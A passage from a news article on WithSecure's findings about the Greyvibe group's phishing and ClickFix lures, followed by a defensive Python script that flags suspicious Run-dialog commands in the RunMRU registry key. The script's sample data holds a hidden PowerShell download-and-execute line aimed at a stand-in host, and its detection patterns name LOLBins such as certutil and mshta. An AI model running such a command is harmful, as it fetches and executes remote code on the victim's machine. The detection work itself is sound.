
“While the activities align with Russian state interests, several observed indicators suggest the group has ties to the broader cybercrime ecosystem, with the group potentially involving current or former cybercriminal actors,” the WithSecure researchers said in their report.
Shifting attack vectors
Greyvibe’s first campaign was launched in August 2025, with a series of spear phishing emails that purported to come from Ukrainian officials and government agencies including the Kyiv City, the Main Directorate of the State Emergency, and the State Service of Special Communications and Information Protection.
The emails included links to ZIP and RAR archives, hosted on Google Drive and a service called 4sync, that contained malware loaders written in Python and JavaScript. The final payload was a custom malware program developed by the group that the WithSecure researchers dubbed PhantomRelay.
In another attack in October, the group experimented with ClickFix-style lures: fake Cloudflare CAPTCHA pages that instructed users to open the Windows Run dialog and paste in malicious commands.
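Commands pasted into the Run dialog are recorded by Windows under HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU, which makes that key a useful place to look for ClickFix activity. The triage helper below is an added example for defenders, not code from the article or the WithSecure report; the RunMRU entries it scans are constructed for the example, and the indicator names and regexes are the author's own heuristics.

```python
"""Flag ClickFix-style command pastes recorded in Explorer's RunMRU key.

RunMRU stores each Run-dialog command as a single-letter value whose data is
"<command>\\1", with the string value "MRUList" giving most-recent-first order.
Added example; SAMPLE_RUNMRU is constructed, not taken from any real host.
"""
import re

# Heuristic indicators (assumed names) for lures that tell a user to paste a
# command into Win+R: hidden/encoded/remote-fetching PowerShell, common LOLBins,
# a URL, or a trailing '#' comment used to disguise the command as a CAPTCHA step.
SUSPICIOUS = [
    ("hidden-or-remote-powershell", re.compile(
        r"\bpowershell(\.exe)?\b.*?(-w(indowstyle)?\s+hidden|-e(nc|ncodedcommand)?\s"
        r"|\biex\b|invoke-expression|downloadstring|\biwr\b|invoke-webrequest)", re.I)),
    ("lolbin", re.compile(r"\b(mshta|curl|certutil|bitsadmin|wscript|cscript|rundll32)(\.exe)?\b", re.I)),
    ("url", re.compile(r"https?://", re.I)),
    ("trailing-comment", re.compile(r"#\s*\S")),
]

# Constructed sample of an exported RunMRU key: one ClickFix-style paste ('c')
# and two benign entries; MRUList "cab" means 'c' is the most recent.
SAMPLE_RUNMRU = {
    "MRUList": "cab",
    "a": "notepad\\1",
    "b": "\\\\fileserver\\share\\1",
    "c": 'powershell -w hidden -c "iwr http://example.invalid/x | iex" # I am not a robot\\1',
}


def parse_runmru(values: dict) -> list[str]:
    """Return Run-dialog commands most recent first, with the '\\1' suffix removed."""
    cmds = []
    for letter in values.get("MRUList", ""):
        data = values.get(letter)
        if data is not None:
            cmds.append(data[:-2] if data.endswith("\\1") else data)
    return cmds


def score(cmd: str) -> list[str]:
    """Names of every indicator that matches this command (empty if none)."""
    return [name for name, rx in SUSPICIOUS if rx.search(cmd)]


def triage(values: dict) -> list[tuple[str, list[str]]]:
    """Commands worth an analyst's attention, each paired with its indicators."""
    return [(c, score(c)) for c in parse_runmru(values) if score(c)]


if __name__ == "__main__":
    for cmd, hits in triage(SAMPLE_RUNMRU):
        print(f"{hits}: {cmd}")
```

On a live host the same dict can be built from `winreg` by enumerating the key's values; an empty result from `triage` means no entry tripped a heuristic, not that the key is clean.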
